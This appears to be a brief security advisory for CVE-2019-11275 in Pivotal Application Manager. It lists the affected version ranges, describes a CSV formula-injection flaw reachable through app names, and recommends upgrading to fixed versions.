CVE-2019-11275

Name of the Vulnerable Software and Affected Versions Pivotal Application Manager versions 666.0.x prior to 666.0.36 Pivotal Application Manager versions 667.0.x prior to 667.0.22 Pivotal Application Manager versions 668.0.x prior to 668.0.21 Pivotal Application Manager versions 669.0.x prior to 669.0.13 Pivotal Application Manager versions 670.0.x prior to 670.0.7

Description The issue allows a remote authenticated user to create an app with a name that can be interpreted by a csv program as a formula, potentially leading to execution. This could enable the malicious user to access a usage report that requires higher privileges.

Recommendations For versions 666.0.x prior to 666.0.36, update to version 666.0.36 or later. For versions 667.0.x prior to 667.0.22, update to version 667.0.22 or later. For versions 668.0.x prior to 668.0.21, update to version 668.0.21 or later. For versions 669.0.x prior to 669.0.13, update to version 669.0.13 or later. For versions 670.0.x prior to 670.0.7, update to version 670.0.7 or later.